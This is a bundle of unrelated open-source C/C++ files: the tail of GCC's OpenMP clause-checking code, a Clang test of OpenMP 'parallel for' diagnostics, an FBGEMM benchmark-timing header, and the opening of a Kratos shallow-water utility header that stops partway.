{
error_at (OMP_CLAUSE_LOCATION (c),
"%<order%> clause must not be used together "
"with %<ordered%>");
remove = true;
break;
}
else if (order_clause)
{
/* Silently remove duplicates. */
remove = true;
break;
}
order_clause = pc;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_IF:
case OMP_CLAUSE_NUM_THREADS:
case OMP_CLAUSE_NUM_TEAMS:
case OMP_CLAUSE_THREAD_LIMIT:
case OMP_CLAUSE_DEFAULT:
case OMP_CLAUSE_UNTIED:
case OMP_CLAUSE_COLLAPSE:
case OMP_CLAUSE_FINAL:
case OMP_CLAUSE_MERGEABLE:
case OMP_CLAUSE_DEVICE:
case OMP_CLAUSE_DIST_SCHEDULE:
case OMP_CLAUSE_PARALLEL:
case OMP_CLAUSE_FOR:
case OMP_CLAUSE_SECTIONS:
case OMP_CLAUSE_TASKGROUP:
case OMP_CLAUSE_PROC_BIND:
case OMP_CLAUSE_DEVICE_TYPE:
case OMP_CLAUSE_PRIORITY:
case OMP_CLAUSE_GRAINSIZE:
case OMP_CLAUSE_NUM_TASKS:
case OMP_CLAUSE_THREADS:
case OMP_CLAUSE_SIMD:
case OMP_CLAUSE_HINT:
case OMP_CLAUSE_DEFAULTMAP:
case OMP_CLAUSE_BIND:
case OMP_CLAUSE_NUM_GANGS:
case OMP_CLAUSE_NUM_WORKERS:
case OMP_CLAUSE_VECTOR_LENGTH:
case OMP_CLAUSE_ASYNC:
case OMP_CLAUSE_WAIT:
case OMP_CLAUSE_AUTO:
case OMP_CLAUSE_INDEPENDENT:
case OMP_CLAUSE_SEQ:
case OMP_CLAUSE_GANG:
case OMP_CLAUSE_WORKER:
case OMP_CLAUSE_VECTOR:
case OMP_CLAUSE_TILE:
case OMP_CLAUSE_IF_PRESENT:
case OMP_CLAUSE_FINALIZE:
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_NOGROUP:
nogroup_seen = pc;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_SCHEDULE:
schedule_clause = c;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_ORDERED:
ordered_clause = c;
if (order_clause)
{
error_at (OMP_CLAUSE_LOCATION (*order_clause),
"%<order%> clause must not be used together "
"with %<ordered%>");
*order_clause = OMP_CLAUSE_CHAIN (*order_clause);
order_clause = NULL;
}
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_SAFELEN:
safelen = c;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_SIMDLEN:
simdlen = c;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_INBRANCH:
case OMP_CLAUSE_NOTINBRANCH:
if (branch_seen)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<inbranch%> clause is incompatible with "
"%<notinbranch%>");
remove = true;
break;
}
branch_seen = true;
pc = &OMP_CLAUSE_CHAIN (c);
continue;
case OMP_CLAUSE_INCLUSIVE:
case OMP_CLAUSE_EXCLUSIVE:
need_complete = true;
need_implicitly_determined = true;
t = OMP_CLAUSE_DECL (c);
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in clause %qs", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
break;
default:
gcc_unreachable ();
}
if (!remove)
{
t = OMP_CLAUSE_DECL (c);
if (need_complete)
{
t = require_complete_type (OMP_CLAUSE_LOCATION (c), t);
if (t == error_mark_node)
remove = true;
}
if (need_implicitly_determined)
{
const char *share_name = NULL;
if (VAR_P (t) && DECL_THREAD_LOCAL_P (t))
share_name = "threadprivate";
else switch (c_omp_predetermined_sharing (t))
{
case OMP_CLAUSE_DEFAULT_UNSPECIFIED:
break;
case OMP_CLAUSE_DEFAULT_SHARED:
if ((OMP_CLAUSE_CODE (c) == OMP_CLAUSE_SHARED
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_FIRSTPRIVATE)
&& c_omp_predefined_variable (t))
/* The __func__ variable and similar function-local
predefined variables may be listed in a shared or
firstprivate clause. */
break;
share_name = "shared";
break;
case OMP_CLAUSE_DEFAULT_PRIVATE:
share_name = "private";
break;
default:
gcc_unreachable ();
}
if (share_name)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is predetermined %qs for %qs",
t, share_name,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
remove = true;
}
else if (TREE_READONLY (t)
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_SHARED
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_FIRSTPRIVATE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<const%> qualified %qE may appear only in "
"%<shared%> or %<firstprivate%> clauses", t);
remove = true;
}
}
}
if (remove)
*pc = OMP_CLAUSE_CHAIN (c);
else
pc = &OMP_CLAUSE_CHAIN (c);
}
if (simdlen
&& safelen
&& tree_int_cst_lt (OMP_CLAUSE_SAFELEN_EXPR (safelen),
OMP_CLAUSE_SIMDLEN_EXPR (simdlen)))
{
error_at (OMP_CLAUSE_LOCATION (simdlen),
"%<simdlen%> clause value is bigger than "
"%<safelen%> clause value");
OMP_CLAUSE_SIMDLEN_EXPR (simdlen)
= OMP_CLAUSE_SAFELEN_EXPR (safelen);
}
if (ordered_clause
&& schedule_clause
&& (OMP_CLAUSE_SCHEDULE_KIND (schedule_clause)
& OMP_CLAUSE_SCHEDULE_NONMONOTONIC))
{
error_at (OMP_CLAUSE_LOCATION (schedule_clause),
"%<nonmonotonic%> schedule modifier specified together "
"with %<ordered%> clause");
OMP_CLAUSE_SCHEDULE_KIND (schedule_clause)
= (enum omp_clause_schedule_kind)
(OMP_CLAUSE_SCHEDULE_KIND (schedule_clause)
& ~OMP_CLAUSE_SCHEDULE_NONMONOTONIC);
}
if (reduction_seen < 0 && ordered_clause)
{
error_at (OMP_CLAUSE_LOCATION (ordered_clause),
"%qs clause specified together with %<inscan%> "
"%<reduction%> clause", "ordered");
reduction_seen = -2;
}
if (reduction_seen < 0 && schedule_clause)
{
error_at (OMP_CLAUSE_LOCATION (schedule_clause),
"%qs clause specified together with %<inscan%> "
"%<reduction%> clause", "schedule");
reduction_seen = -2;
}
if (linear_variable_step_check || reduction_seen == -2)
for (pc = &clauses, c = clauses; c ; c = *pc)
{
bool remove = false;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_LINEAR
&& OMP_CLAUSE_LINEAR_VARIABLE_STRIDE (c)
&& !bitmap_bit_p (&map_head,
DECL_UID (OMP_CLAUSE_LINEAR_STEP (c))))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%<linear%> clause step is a parameter %qD not "
"specified in %<uniform%> clause",
OMP_CLAUSE_LINEAR_STEP (c));
remove = true;
}
else if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION)
OMP_CLAUSE_REDUCTION_INSCAN (c) = 0;
if (remove)
*pc = OMP_CLAUSE_CHAIN (c);
else
pc = &OMP_CLAUSE_CHAIN (c);
}
if (nogroup_seen && reduction_seen)
{
error_at (OMP_CLAUSE_LOCATION (*nogroup_seen),
"%<nogroup%> clause must not be used together with "
"%<reduction%> clause");
*nogroup_seen = OMP_CLAUSE_CHAIN (*nogroup_seen);
}
bitmap_obstack_release (NULL);
return clauses;
}
/* Return code to initialize DST with a copy constructor from SRC.
C doesn't have copy constructors nor assignment operators, only for
_Atomic vars we need to perform __atomic_load from src into a temporary
followed by __atomic_store of the temporary to dst. */
tree
c_omp_clause_copy_ctor (tree clause, tree dst, tree src)
{
if (!really_atomic_lvalue (dst) && !really_atomic_lvalue (src))
return build2 (MODIFY_EXPR, TREE_TYPE (dst), dst, src);
location_t loc = OMP_CLAUSE_LOCATION (clause);
tree type = TREE_TYPE (dst);
tree nonatomic_type = build_qualified_type (type, TYPE_UNQUALIFIED);
tree tmp = create_tmp_var (nonatomic_type);
tree tmp_addr = build_fold_addr_expr (tmp);
TREE_ADDRESSABLE (tmp) = 1;
TREE_NO_WARNING (tmp) = 1;
tree src_addr = build_fold_addr_expr (src);
tree dst_addr = build_fold_addr_expr (dst);
tree seq_cst = build_int_cst (integer_type_node, MEMMODEL_SEQ_CST);
vec<tree, va_gc> *params;
/* Expansion of a generic atomic load may require an addition
element, so allocate enough to prevent a resize. */
vec_alloc (params, 4);
/* Build __atomic_load (&src, &tmp, SEQ_CST); */
tree fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_LOAD);
params->quick_push (src_addr);
params->quick_push (tmp_addr);
params->quick_push (seq_cst);
tree load = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
vec_alloc (params, 4);
/* Build __atomic_store (&dst, &tmp, SEQ_CST); */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_STORE);
params->quick_push (dst_addr);
params->quick_push (tmp_addr);
params->quick_push (seq_cst);
tree store = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
return build2 (COMPOUND_EXPR, void_type_node, load, store);
}
/* Create a transaction node. */
tree
c_finish_transaction (location_t loc, tree block, int flags)
{
tree stmt = build_stmt (loc, TRANSACTION_EXPR, block);
if (flags & TM_STMT_ATTR_OUTER)
TRANSACTION_EXPR_OUTER (stmt) = 1;
if (flags & TM_STMT_ATTR_RELAXED)
TRANSACTION_EXPR_RELAXED (stmt) = 1;
return add_stmt (stmt);
}
/* Make a variant type in the proper way for C/C++, propagating qualifiers
down to the element type of an array. If ORIG_QUAL_TYPE is not
NULL, then it should be used as the qualified type
ORIG_QUAL_INDIRECT levels down in array type derivation (to
preserve information about the typedef name from which an array
type was derived). */
tree
c_build_qualified_type (tree type, int type_quals, tree orig_qual_type,
size_t orig_qual_indirect)
{
if (type == error_mark_node)
return type;
if (TREE_CODE (type) == ARRAY_TYPE)
{
tree t;
tree element_type = c_build_qualified_type (TREE_TYPE (type),
type_quals, orig_qual_type,
orig_qual_indirect - 1);
/* See if we already have an identically qualified type. */
if (orig_qual_type && orig_qual_indirect == 0)
t = orig_qual_type;
else
for (t = TYPE_MAIN_VARIANT (type); t; t = TYPE_NEXT_VARIANT (t))
{
if (TYPE_QUALS (strip_array_types (t)) == type_quals
&& TYPE_NAME (t) == TYPE_NAME (type)
&& TYPE_CONTEXT (t) == TYPE_CONTEXT (type)
&& attribute_list_equal (TYPE_ATTRIBUTES (t),
TYPE_ATTRIBUTES (type)))
break;
}
if (!t)
{
tree domain = TYPE_DOMAIN (type);
t = build_variant_type_copy (type);
TREE_TYPE (t) = element_type;
if (TYPE_STRUCTURAL_EQUALITY_P (element_type)
|| (domain && TYPE_STRUCTURAL_EQUALITY_P (domain)))
SET_TYPE_STRUCTURAL_EQUALITY (t);
else if (TYPE_CANONICAL (element_type) != element_type
|| (domain && TYPE_CANONICAL (domain) != domain))
{
tree unqualified_canon
= build_array_type (TYPE_CANONICAL (element_type),
domain? TYPE_CANONICAL (domain)
: NULL_TREE);
if (TYPE_REVERSE_STORAGE_ORDER (type))
{
unqualified_canon
= build_distinct_type_copy (unqualified_canon);
TYPE_REVERSE_STORAGE_ORDER (unqualified_canon) = 1;
}
TYPE_CANONICAL (t)
= c_build_qualified_type (unqualified_canon, type_quals);
}
else
TYPE_CANONICAL (t) = t;
}
return t;
}
/* A restrict-qualified pointer type must be a pointer to object or
incomplete type. Note that the use of POINTER_TYPE_P also allows
REFERENCE_TYPEs, which is appropriate for C++. */
if ((type_quals & TYPE_QUAL_RESTRICT)
&& (!POINTER_TYPE_P (type)
|| !C_TYPE_OBJECT_OR_INCOMPLETE_P (TREE_TYPE (type))))
{
error ("invalid use of %<restrict%>");
type_quals &= ~TYPE_QUAL_RESTRICT;
}
tree var_type = (orig_qual_type && orig_qual_indirect == 0
? orig_qual_type
: build_qualified_type (type, type_quals));
/* A variant type does not inherit the list of incomplete vars from the
type main variant. */
if ((RECORD_OR_UNION_TYPE_P (var_type)
|| TREE_CODE (var_type) == ENUMERAL_TYPE)
&& TYPE_MAIN_VARIANT (var_type) != var_type)
C_TYPE_INCOMPLETE_VARS (var_type) = 0;
return var_type;
}
/* Build a VA_ARG_EXPR for the C parser. */
tree
c_build_va_arg (location_t loc1, tree expr, location_t loc2, tree type)
{
if (error_operand_p (type))
return error_mark_node;
/* VA_ARG_EXPR cannot be used for a scalar va_list with reverse storage
order because it takes the address of the expression. */
else if (handled_component_p (expr)
&& reverse_storage_order_for_component_p (expr))
{
error_at (loc1, "cannot use %<va_arg%> with reverse storage order");
return error_mark_node;
}
else if (!COMPLETE_TYPE_P (type))
{
error_at (loc2, "second argument to %<va_arg%> is of incomplete "
"type %qT", type);
return error_mark_node;
}
else if (warn_cxx_compat && TREE_CODE (type) == ENUMERAL_TYPE)
warning_at (loc2, OPT_Wc___compat,
"C++ requires promoted type, not enum type, in %<va_arg%>");
return build_va_arg (loc2, expr, type);
}
/* Return truthvalue of whether T1 is the same tree structure as T2.
Return 1 if they are the same. Return false if they are different. */
bool
c_tree_equal (tree t1, tree t2)
{
enum tree_code code1, code2;
if (t1 == t2)
return true;
if (!t1 || !t2)
return false;
for (code1 = TREE_CODE (t1);
CONVERT_EXPR_CODE_P (code1)
|| code1 == NON_LVALUE_EXPR;
code1 = TREE_CODE (t1))
t1 = TREE_OPERAND (t1, 0);
for (code2 = TREE_CODE (t2);
CONVERT_EXPR_CODE_P (code2)
|| code2 == NON_LVALUE_EXPR;
code2 = TREE_CODE (t2))
t2 = TREE_OPERAND (t2, 0);
/* They might have become equal now. */
if (t1 == t2)
return true;
if (code1 != code2)
return false;
switch (code1)
{
case INTEGER_CST:
return wi::to_wide (t1) == wi::to_wide (t2);
case REAL_CST:
return real_equal (&TREE_REAL_CST (t1), &TREE_REAL_CST (t2));
case STRING_CST:
return TREE_STRING_LENGTH (t1) == TREE_STRING_LENGTH (t2)
&& !memcmp (TREE_STRING_POINTER (t1), TREE_STRING_POINTER (t2),
TREE_STRING_LENGTH (t1));
case FIXED_CST:
return FIXED_VALUES_IDENTICAL (TREE_FIXED_CST (t1),
TREE_FIXED_CST (t2));
case COMPLEX_CST:
return c_tree_equal (TREE_REALPART (t1), TREE_REALPART (t2))
&& c_tree_equal (TREE_IMAGPART (t1), TREE_IMAGPART (t2));
case VECTOR_CST:
return operand_equal_p (t1, t2, OEP_ONLY_CONST);
case CONSTRUCTOR:
/* We need to do this when determining whether or not two
non-type pointer to member function template arguments
are the same. */
if (!comptypes (TREE_TYPE (t1), TREE_TYPE (t2))
|| CONSTRUCTOR_NELTS (t1) != CONSTRUCTOR_NELTS (t2))
return false;
{
tree field, value;
unsigned int i;
FOR_EACH_CONSTRUCTOR_ELT (CONSTRUCTOR_ELTS (t1), i, field, value)
{
constructor_elt *elt2 = CONSTRUCTOR_ELT (t2, i);
if (!c_tree_equal (field, elt2->index)
|| !c_tree_equal (value, elt2->value))
return false;
}
}
return true;
case TREE_LIST:
if (!c_tree_equal (TREE_PURPOSE (t1), TREE_PURPOSE (t2)))
return false;
if (!c_tree_equal (TREE_VALUE (t1), TREE_VALUE (t2)))
return false;
return c_tree_equal (TREE_CHAIN (t1), TREE_CHAIN (t2));
case SAVE_EXPR:
return c_tree_equal (TREE_OPERAND (t1, 0), TREE_OPERAND (t2, 0));
case CALL_EXPR:
{
tree arg1, arg2;
call_expr_arg_iterator iter1, iter2;
if (!c_tree_equal (CALL_EXPR_FN (t1), CALL_EXPR_FN (t2)))
return false;
for (arg1 = first_call_expr_arg (t1, &iter1),
arg2 = first_call_expr_arg (t2, &iter2);
arg1 && arg2;
arg1 = next_call_expr_arg (&iter1),
arg2 = next_call_expr_arg (&iter2))
if (!c_tree_equal (arg1, arg2))
return false;
if (arg1 || arg2)
return false;
return true;
}
case TARGET_EXPR:
{
tree o1 = TREE_OPERAND (t1, 0);
tree o2 = TREE_OPERAND (t2, 0);
/* Special case: if either target is an unallocated VAR_DECL,
it means that it's going to be unified with whatever the
TARGET_EXPR is really supposed to initialize, so treat it
as being equivalent to anything. */
if (VAR_P (o1) && DECL_NAME (o1) == NULL_TREE
&& !DECL_RTL_SET_P (o1))
/*Nop*/;
else if (VAR_P (o2) && DECL_NAME (o2) == NULL_TREE
&& !DECL_RTL_SET_P (o2))
/*Nop*/;
else if (!c_tree_equal (o1, o2))
return false;
return c_tree_equal (TREE_OPERAND (t1, 1), TREE_OPERAND (t2, 1));
}
case COMPONENT_REF:
if (TREE_OPERAND (t1, 1) != TREE_OPERAND (t2, 1))
return false;
return c_tree_equal (TREE_OPERAND (t1, 0), TREE_OPERAND (t2, 0));
case PARM_DECL:
case VAR_DECL:
case CONST_DECL:
case FIELD_DECL:
case FUNCTION_DECL:
case IDENTIFIER_NODE:
case SSA_NAME:
return false;
case TREE_VEC:
{
unsigned ix;
if (TREE_VEC_LENGTH (t1) != TREE_VEC_LENGTH (t2))
return false;
for (ix = TREE_VEC_LENGTH (t1); ix--;)
if (!c_tree_equal (TREE_VEC_ELT (t1, ix),
TREE_VEC_ELT (t2, ix)))
return false;
return true;
}
default:
break;
}
switch (TREE_CODE_CLASS (code1))
{
case tcc_unary:
case tcc_binary:
case tcc_comparison:
case tcc_expression:
case tcc_vl_exp:
case tcc_reference:
case tcc_statement:
{
int i, n = TREE_OPERAND_LENGTH (t1);
switch (code1)
{
case PREINCREMENT_EXPR:
case PREDECREMENT_EXPR:
case POSTINCREMENT_EXPR:
case POSTDECREMENT_EXPR:
n = 1;
break;
case ARRAY_REF:
n = 2;
break;
default:
break;
}
if (TREE_CODE_CLASS (code1) == tcc_vl_exp
&& n != TREE_OPERAND_LENGTH (t2))
return false;
for (i = 0; i < n; ++i)
if (!c_tree_equal (TREE_OPERAND (t1, i), TREE_OPERAND (t2, i)))
return false;
return true;
}
case tcc_type:
return comptypes (t1, t2);
default:
gcc_unreachable ();
}
/* We can get here with --disable-checking. */
return false;
}
/* Returns true when the function declaration FNDECL is implicit,
introduced as a result of a call to an otherwise undeclared
function, and false otherwise. */
bool
c_decl_implicit (const_tree fndecl)
{
return C_DECL_IMPLICIT (fndecl);
}
|
parallel_for_misc_messages.c | // RUN: %clang_cc1 -fsyntax-only -fopenmp -verify %s
// expected-error@+1 {{unexpected OpenMP directive '#pragma omp parallel for'}}
#pragma omp parallel for
// expected-error@+1 {{unexpected OpenMP directive '#pragma omp parallel for'}}
#pragma omp parallel for foo
void test_no_clause() {
int i;
#pragma omp parallel for
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{statement after '#pragma omp parallel for' must be a for loop}}
#pragma omp parallel for
++i;
}
void test_branch_protected_scope() {
int i = 0;
L1:
++i;
int x[24];
#pragma omp parallel for
for (i = 0; i < 16; ++i) {
if (i == 5)
goto L1; // expected-error {{use of undeclared label 'L1'}}
else if (i == 6)
return; // expected-error {{cannot return from OpenMP region}}
else if (i == 7)
goto L2;
else if (i == 8) {
L2:
x[i]++;
}
}
if (x[0] == 0)
goto L2; // expected-error {{use of undeclared label 'L2'}}
else if (x[1] == 1)
goto L1;
}
void test_invalid_clause() {
int i;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for foo bar
for (i = 0; i < 16; ++i)
;
}
void test_non_identifiers() {
int i, x;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for;
for (i = 0; i < 16; ++i)
;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for private(x);
for (i = 0; i < 16; ++i)
;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for, private(x);
for (i = 0; i < 16; ++i)
;
}
extern int foo();
void test_collapse() {
int i;
// expected-error@+1 {{expected '('}}
#pragma omp parallel for collapse
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}} expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for collapse(
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for collapse()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}} expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for collapse(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}} expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for collapse(, )
for (i = 0; i < 16; ++i)
;
// expected-warning@+2 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
// expected-error@+1 {{expected '('}}
#pragma omp parallel for collapse 4)
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4,
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4, )
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4 4)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4, , 4)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
#pragma omp parallel for collapse(4)
for (int i1 = 0; i1 < 16; ++i1)
for (int i2 = 0; i2 < 16; ++i2)
for (int i3 = 0; i3 < 16; ++i3)
for (int i4 = 0; i4 < 16; ++i4)
foo();
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4, 8)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+1 {{expression is not an integer constant expression}}
#pragma omp parallel for collapse(2.5)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expression is not an integer constant expression}}
#pragma omp parallel for collapse(foo())
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{argument to 'collapse' clause must be a strictly positive integer value}}
#pragma omp parallel for collapse(-5)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{argument to 'collapse' clause must be a strictly positive integer value}}
#pragma omp parallel for collapse(0)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{argument to 'collapse' clause must be a strictly positive integer value}}
#pragma omp parallel for collapse(5 - 5)
for (i = 0; i < 16; ++i)
;
// expected-note@+1 {{defined as firstprivate}}
#pragma omp parallel for collapse(2) firstprivate(i)
for (i = 0; i < 16; ++i)
// expected-note@+1 {{variable with automatic storage duration is predetermined as private; perhaps you forget to enclose 'omp for' directive into a parallel or another task region?}}
for (int j = 0; j < 16; ++j)
// expected-error@+2 2 {{reduction variable must be shared}}
// expected-error@+1 {{region cannot be closely nested inside 'parallel for' region; perhaps you forget to enclose 'omp for' directive into a parallel region?}}
#pragma omp for reduction(+ : i, j)
for (int k = 0; k < 16; ++k)
i += j;
}
void test_private() {
int i;
// expected-error@+2 {{expected expression}}
// expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for private(
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for private(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for private(, )
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for private()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for private(int)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected variable name}}
#pragma omp parallel for private(0)
for (i = 0; i < 16; ++i)
;
int x, y, z;
#pragma omp parallel for private(x)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for private(x, y)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for private(x, y, z)
for (i = 0; i < 16; ++i) {
x = y * i + z;
}
}
void test_lastprivate() {
int i;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 {{expected expression}}
#pragma omp parallel for lastprivate(
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for lastprivate(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for lastprivate(, )
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for lastprivate()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for lastprivate(int)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected variable name}}
#pragma omp parallel for lastprivate(0)
for (i = 0; i < 16; ++i)
;
int x, y, z;
#pragma omp parallel for lastprivate(x)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y, z)
for (i = 0; i < 16; ++i)
;
}
void test_firstprivate() {
int i;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 {{expected expression}}
#pragma omp parallel for firstprivate(
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for firstprivate(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for firstprivate(, )
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for firstprivate()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for firstprivate(int)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected variable name}}
#pragma omp parallel for firstprivate(0)
for (i = 0; i < 16; ++i)
;
int x, y, z;
#pragma omp parallel for lastprivate(x) firstprivate(x)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y) firstprivate(x, y)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y, z) firstprivate(x, y, z)
for (i = 0; i < 16; ++i)
;
}
void test_loop_messages() {
float a[100], b[100], c[100];
// expected-error@+2 {{variable must be of integer or pointer type}}
#pragma omp parallel for
for (float fi = 0; fi < 10.0; fi++) {
c[(int)fi] = a[(int)fi] + b[(int)fi];
}
// expected-error@+2 {{variable must be of integer or pointer type}}
#pragma omp parallel for
for (double fi = 0; fi < 10.0; fi++) {
c[(int)fi] = a[(int)fi] + b[(int)fi];
}
}
|
BenchUtils.h | /*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#pragma once
#include <chrono>
#include <vector>
#ifdef _OPENMP
#include <omp.h>
#endif
#include "AlignedVec.h"
namespace fbgemm {
template <typename T>
void randFill(aligned_vector<T>& vec, T low, T high);
void llc_flush(std::vector<char>& llc);
int fbgemm_get_num_threads();
int fbgemm_get_thread_num();
/**
* @params llc if not nullptr, flush llc
*/
template <class Fn>
double measureWithWarmup(
Fn&& fn,
int warmupIterations,
int measuredIterations,
std::vector<char>* llc = nullptr,
bool useOpenMP = false) {
for (int i = 0; i < warmupIterations; ++i) {
if (llc) {
llc_flush(*llc);
}
fn();
}
double ttot = 0.0;
#ifdef _OPENMP
#pragma omp parallel if (useOpenMP)
#endif
for (int i = 0; i < measuredIterations; ++i) {
int thread_id = 0;
std::chrono::time_point<std::chrono::high_resolution_clock> start, end;
#ifdef _OPENMP
if (useOpenMP) {
thread_id = omp_get_thread_num();
}
#endif
if (llc && thread_id == 0) {
llc_flush(*llc);
}
#ifdef _OPENMP
if (useOpenMP) {
#pragma omp barrier
}
#endif
start = std::chrono::high_resolution_clock::now();
fn();
end = std::chrono::high_resolution_clock::now();
auto dur =
std::chrono::duration_cast<std::chrono::nanoseconds>(end - start);
if (thread_id == 0) {
// TODO: measure load imbalance
ttot += dur.count();
}
}
return ttot / 1e9 / measuredIterations;
}
} // namespace fbgemm
|
flow_rate_slip_utility.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Miguel Maso Sotomayor
//
#ifndef KRATOS_FLOW_RATE_SLIP_UTILITY_H_INCLUDED
#define KRATOS_FLOW_RATE_SLIP_UTILITY_H_INCLUDED
// System includes
// External includes
// Project includes
#include "utilities/coordinate_transformation_utilities.h"
namespace Kratos
{
///@addtogroup ShallowWaterApplication
///@{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
